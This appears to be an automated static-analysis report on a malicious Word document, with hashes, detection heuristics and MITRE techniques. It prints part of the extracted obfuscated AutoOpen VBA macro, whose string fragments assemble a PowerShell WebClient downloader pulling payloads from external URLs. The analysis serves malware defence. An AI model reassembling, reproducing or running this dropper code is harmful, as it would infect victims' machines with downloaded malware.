Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4138659b0d9c3db3…

MALICIOUS

Office (OLE)

137.5 KB Created: 2018-02-09 15:22:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: c88adf2b08e0d77c943e5d25b1798131 SHA-1: e61da90b8255858bfbee39dbd75cc57af770015e SHA-256: 4138659b0d9c3db3e94a1defa7274cabd0075efd78025678d813e8b4f424ea4f
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro includes a call to the Shell() function, which is a strong indicator of malicious intent to execute arbitrary commands. The presence of an AutoOpen macro further suggests automatic execution upon opening the document. The ClamAV detection 'Doc.Dropper.Agent-6444901-0' supports the assessment that this file acts as a dropper for other malware.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6444901-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6444901-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://wiOFl+OFlz1b+z1btocarsOFl+OFl.HoXWpGHcMGqVWF In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26667 bytes
SHA-256: 047053c86fedcf54520d6b90a3fd84ff96ceabf1af1b98dad0fd92751b8ae319
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mAzhJAqqwZTua"
Sub AutoOpen()
On Error Resume Next
chGPGNWBF = (1789645 * mitLljnL * 283909 - uVQRzVoIidTd) + FinfWCqNkVBHrw + Sqr(pjz) * (GjiMqwIsi / 8760940)
WjGJmodwB = (3263042 * KbKAO * 1791334 - YlTC) + qWPXVzjOKI + Sqr(NovwFIZ) * (fjTwEYMbpCUw / 5088547)
UAPmWRHBU = (530169 * BHwLSKAQLcWzWa * 2156340 - JVrLqMttofMiqS) + KdUuwbBIiBEk + Sqr(zBsMLSwfdqJpNC) * (nwSZtnMV / 480383)
Application.Run "VmllTZHjYaiSn", HiriLapqWEzCod
fOXIMNKmb = (9170484 * nnzWYUJjmLFjZi * 4171970 - jirKkfqjzv) + TQjXOSGjzwvB + Sqr(dfirafwd) * (jaHjkLHzTZdi / 8117537)
QFoqQSvWh = (7802846 * RhEzwGSwM * 5433363 - GPihubCfVXv) + OcDjOfhUzldS + Sqr(GKw) * (HjRNhz / 4710603)
End Sub
Function HiriLapqWEzCod()
On Error Resume Next
dwGTRajHhuQ = (9625630 * TvST * 8112317 - WEnQKO) + CwWXJTSqawZs + Sqr(bVBXfJUSpI) * (fjpzjCGs / 384982)
EpiOsCCRAV = (2460198 * LqAajfNszt * 5105561 - nADPk) + uXM + Sqr(AsciTHYpjqTu) * (KWEap / 917548)
VIAdd = (9484433 * cEWBw * 6046093 - VsHoUXpIzFL) + TJMj + Sqr(sqtsjaFTPiYn) * (cVbl / 3775827)
iPqzFVS = IEowWDVopX + Mid(QDj + "ojTJtwYpqYS+OFl+OFl0yb-OFl+u7W+u7WOFlou7W+u7Wbj'+'ectOFl+OFl0yOFl+O'+'Flz1b+z1bb)'+' SystemOFl+'+'OFl.Net.WOFl+OFu7W+u7WlebClOFz1b+zu7W'+'+u7W1bl+OFlienOFl+OF'+'lt;7hONSB = OFl+OFl'+'7h'+'OnjmzoUDiGTPwEhZaEFjZmN" + MYkC, 12, 179)
fVPvA = (3406676 * rcqiiqY * 132169 - TDYiZ) + bVmf + Sqr(SbTM) * (rdWjIVtDuPsn / 3671682)
ksLOZDMwu = (8993686 * rUTpE * 2730200 - QMaASN) + BPJdp + Sqr(MBTDwKUkJMnB) * (WRwIdHbbNJGH / 448131)
nOEVFBnYjjB = (6116640 * sziKdDwpAPrut * 5994769 - Amwb) + rCHfVOPwrNwv + Sqr(arKddYnZbw) * (lNhwGJTIaoCpr / 568945)
nqqRfj = jiZmUOGVdwdzP + Mid(fIImupR + "rqddbu7W+u7WOFlSDC);bOFl+OFlreak;}u7W+u7WOFl+OFlcatchOFl+OFl{}}OFl)-cREPLACe([chaR]111+[chaR]70+[chaR]68),[c'+'haR]92  -REPLAcE ([c'+'haR]110+[chaz1b+z1bR]102RZTNJKCCYsiTbwTO" + VEt, 5, 154)
lEnaqwhQhYp = (5817224 * apzPJ * 2014000 - JinXmldIjiV) + Orfb + Sqr(tliwUQnq) * (soEJQJhvkEh / 3636104)
zjlfFzB = (7393907 * pRIaiV * 2946597 - uOYWYjq) + RzhAtoEWRLYS + Sqr(btGH) * (piLqIUW / 4626760)
IjrJY = (8930701 * lulBFvmhllXA * 2645270 - ITwwNSURODr) + dbqMi + Sqr(uOkXZXN) * (oMUVz / 7805651)
qSlMzimwU = PnwzmTvPSnwWJ + Mid(nRQEOuHjS + "NRdpLDjCZEW+OFlenu7W+u7WtroinfOFl+OFlisz1b+z1u7W+u7Wbsi.ez1b+z1bu/XO'+'Fl+OFlgxk/OFl+OFl?http:/OFl+OFl/OFl+OFlteu7W+'+'u7Wz1b+z1bcnopiOFl+OFla.org/TOFl+OFu'+'7W+u7Wl'+'o1OFl+OFlyEaTYFWqIvmiAzkUdLFwXrwqihi" + iunUpYCSapJzb, 12, 167)
UdohChlZb = (8823919 * oDK * 3550579 - QrrNUudVvNuiQ) + vvzrJzMX + Sqr(cHzNRolDsnG) * (tCKOGBnBjLU / 5981754)
WaQDjzqiN = (5818229 * GoMAVjtFPGXhLj * 1936671 - CuKpC) + odDwZWFQmRjTi + Sqr(rrSZqomEqYpGrX) * (aUov / 2494687)
KkhtrwVXdMI = (9918734 * wYHXAwTFwrz * 2534498 - LbkzOGk) + iGSfhIMzuXV + Sqr(HutSTnoklawJdF) * (wkphGOzSSosSpG / 1600641)
CMiCpwPSqm = ahpYaKbVU + Mid(iJtRLqZHCG + "Z+'+[chaR]103u7W+u7W),[chaR]96-cREPLACu7W+u7W'+'e'+'  OFl0'+'u7W+u7WybOFl,[chaR]39-'+'cREPLAC'+'e ([chaR]55+[chaR]104+z1b+z1b[chaR]79),[chaR]36-cREPLAz1b+z1bCe OFlIbGOFl,[chaR]34uBjjSrPuBwlj" + AltYiBiIwtGCvD, 2, 177)
pkwOS = (5460347 * daUwdcWih * 2714863 - jRSJHoOwOKfrq) + svwdMhAoFo + Sqr(GTWY) * (icmhfwvwja / 3743739)
pvbNFkWPbnU = (2669922 * RwjiTl * 6477696 - AUjvrLdD) + VsY + Sqr(jCEJzwACum) * (maopVb / 9940551)
siPvRDLjnYZ = (7084602 * IdHGmnkRsiFa * 8025872 - kvfVUohWFi) + IRWohZV + Sqr(hYCu) * (WLLjJMjnwsDtqG / 5959948)
wOYzvI = TbPKQhR + Mid(aRzBEIJBcL + "pbGs/?OFl+OFlhtOFl+OFltp:/OFl+OFl/spOFl+OFl'+'orOFl+OFl'+'tfishing.vip/z1b+z'+'1b'+'tOFl+OFl9u7W+u7WI0fu7W+u7W/?http:/z1b+z1b/OFu7W+u7Wl+OFljaOFl+OFlvi'+'yale.comhRmJzn" + NFqPiK, 5, 158)
CVnPDLRJ = (8406148 * qMYliVK * 8735623 - zGzDwUojVsII) + SKZiYIQv + Sqr(hSqtGjXDfXFSj) * (NpEKYpzBiKUtO / 2366982)
wbMRkbK = (9962163 * BcuBYjNDOEMSNl * 563144 - mSM) + TwsFwfjfZMVK + Sqr(iVc) * (iSjbBvTd
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.